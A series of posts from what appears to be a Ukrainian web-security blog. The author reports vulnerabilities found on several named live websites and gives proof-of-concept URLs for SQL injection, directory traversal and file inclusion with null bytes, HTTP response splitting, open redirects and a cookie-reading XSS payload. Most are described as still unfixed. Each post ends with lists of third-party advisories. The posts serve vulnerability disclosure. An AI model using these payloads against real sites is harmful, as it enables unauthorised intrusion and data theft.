Websecurity - Веб безпека

21.01.2011

У листопаді, 05.11.2010, я знайшов Cross-Site Scripting, Abuse of Functionality та Brute Force уразливості на проекті http://mirkvartir.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2011

XSS:

Три XSS уразливості - дві на сторінці реєстрації та одна на сторінці відновлення паролю. Приклади експлоітів для даних уразливостей.

Abuse of Functionality:

http://mirkvartir.ua/users/register

http://mirkvartir.ua/users/remind

На сторінках реєстрації та відновлення паролю можна визначати емайли користувачів (що є логінами).

Brute Force:

http://mirkvartir.ua/admin/

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• CodeMeter WebAdmin Cross-site Scripting (XSS) Vulnerability (деталі)
• XSRF (CSRF) in LotusCMS (деталі)
• Sun Microsystems Directory Server DSML-over-HTTP Username Search Denial of Service Vulnerability (деталі)
• XSS vulnerability in LotusCMS (деталі)
• Sun Microsystems Directory Server Enterprise ASN.1 Parsing Remote Code Execution Vulnerability (деталі)
• BoutikOne Multiples SQL Injection Vulnerability (деталі)
• Sun Microsystems Directory Server Enterprise DSML UTF-8 Denial of Service Vulnerability (деталі)
• SAP NetWaver XI SOAP Adapter - XSS (деталі)
• Hackproofing Oracle Financials 11i & R12 (деталі)
• SAP NetWeaver logon.html - XSS (деталі)

18.01.2011

У жовтні, 30.10.2010, я знайшов SQL Injection, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.d1.ie. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

10.10.2011

SQL Injection:

http://www.d1.ie/visual.php?intProjectID=-1%20or%20version()%3E4

http://www.d1.ie/page.php?intPageID=-1%20or%20version()%3E4

SQL DB Structure Extraction:

http://www.d1.ie/visual.php?intProjectID=’

http://www.d1.ie/page.php?intPageID=’

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• 7T Interactive Graphical SCADA System (IGSS) Remote Memory Corruption (деталі)
• Path disclosure in xt:Commerce (деталі)
• Path disclosure in OXID eShop (деталі)
• Cisco RVS4000 and WRVS4400N Web Management Interface Vulnerabilities (деталі)
• File Content Disclosure in LotusCMS (деталі)
• Cisco Content Delivery System Internet Streamer: Web Server Vulnerability (деталі)
• XSS vulnerability in LotusCMS (деталі)
• Remote Password Disclosure Vulnerability in RXS-3211 IP Camera + others (деталі)
• XSS vulnerability in LotusCMS (деталі)
• XSS vulnerability in LotusCMS (деталі)

19.01.2011

У жовтні, 30.10.2010, я знайшов Directory Traversal, Local File Include, Null Byte Injection та Denial of Service уразливості на хакерському проекті http://hackzona.ru (на DT дірку звернув мою увагу Dementor). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на hackzona.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.10.2011

Directory Traversal + Null Byte Injection:

http://hackzona.ru/hz.php?name=News&file=../../robots.txt%00

Local File Include + Null Byte Injection:

http://hackzona.ru/hz.php?name=News&file=file.php%00

DoS (Recursive File Include):

http://hackzona.ru/hz.php?name=News&file=../../hz

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• HP 3COM/H3C Intelligent Management Center tftpserver WRQ Remote Code Execution Vulnerability (деталі)
• Multiple XSS vulnerabilities in CosmoShop (деталі)
• HP 3COM/H3C Intelligent Management Center img Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in CosmoShop (деталі)
• HP 3COM/H3C Intelligent Management Center tftpserver DATA/ERROR Remote Code Execution Vulnerability (деталі)
• SAP NetWeaver Integration Directory - multiple XSS (деталі)
• HP Intelligent Management Center (IMC), Remote Execution of Arbitrary Code (деталі)
• SAP NetWeaver Runtime - multiple XSS (деталі)
• HP/Palm webOS, Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized File System Write Access (деталі)
• SugarCRM list privilege restriction bypass (деталі)

13.01.2011

У жовтні, 25.10.2010, я знайшов HTTP Response Splitting, Cross-Site Scripting та Redirector уразливості на проекті http://www.ex.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.ex.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

07.10.2011

HTTP Response Splitting:

http://www.ex.ua/delete_object/1?back=http://1%0AHeader:1

XSS (через HTTP Response Splitting):

• alert(document.cookie)
• цікавий

Redirector (URL Redirector Abuse):

http://www.ex.ua/delete_object/1?back=http://websecurity.com.ua

Дані уразливості досі не виправлені. Що дуже типово для ламерів-адмінів цього сайта.

В даній добірці уразливості в веб додатках:

• HP 3COM/H3C Intelligent Management Center tftpserver mode Remote Code Execution Vulnerability (деталі)
• Re: Cross-Site Scripting vulnerability in Nagios (деталі)
• HP 3COM/H3C Intelligent Management Center imcsyslogdm Remote Code Execution Vulnerability (деталі)
• Air Contacts Lite (iPhone / iPod App Denial Of Service) (деталі)
• HP 3COM/H3C Intelligent Management Center tftpserver opcode_table Remote Code Execution Vulnerability (деталі)
• Cross-Site Scripting vulnerability in Nagios (деталі)
• HP 3COM/H3C Intelligent Management Center dbman sprintf Remote Code Execution Vulnerability (деталі)
• SQL injection vulnerability in CosmoShop (деталі)
• VMware vCenter Server and vSphere Client security vulnerabilities (деталі)
• XSS vulnerability in CosmoShop (деталі)

10.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://www.bezpeka-service.com.ua - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.bezpeka-service.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

06.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://www.bezpeka-service.com.ua/_kontakti_0_5_menu_0_2.html) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://www.bezpeka-service.com.ua/_kontakti_0_5_menu_0_2.html
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Sybase M-Business Anywhere agSoap.exe password Tag Remote Code Execution Vulnerability (деталі)
• Mutare Software EVM - CSRF and XSS Vulnerabilities (деталі)
• Sybase M-Business Anywhere Server agd.exe encodeUsername Remote Code Execution Vulnerability (деталі)
• InSite Troubleshooting Cross-Site Scripting (деталі)
• Sybase M-Business Anywhere agd.exe username Parameter Remote Code Execution Vulnerability (деталі)
• Kodak InSite Login Page Cross-Site Scripting (деталі)
• Security Notice for CA eHealth (деталі)
• Cross-Site Scripting vulnerabilities in Icinga (деталі)
• Oracle GlassFish Server Administration Console Authentication Bypass (деталі)
• RecordPress Multiple Vulnerabilities (деталі)